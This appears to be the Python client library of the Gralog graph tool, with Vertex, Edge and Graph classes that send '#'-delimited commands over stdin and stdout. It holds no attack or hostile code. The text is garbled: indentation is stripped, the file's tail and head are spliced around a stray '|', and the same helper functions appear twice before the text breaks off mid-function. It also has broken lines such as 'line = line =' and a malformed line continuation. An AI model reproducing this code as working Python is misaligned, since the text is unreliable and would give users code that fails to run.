sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
vString = line[0]
v = self.getVertexOrNew(int(vString))
self.vertices[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
# creates a random Erdos-Reny graph with n id_to_vertex and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
# end manilupative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
except:
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python???
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
v = self.getId()
v_str = str(v)
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
vString = line[0]
v = self.getVertexOrNew(int(vString))
self.vertices[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
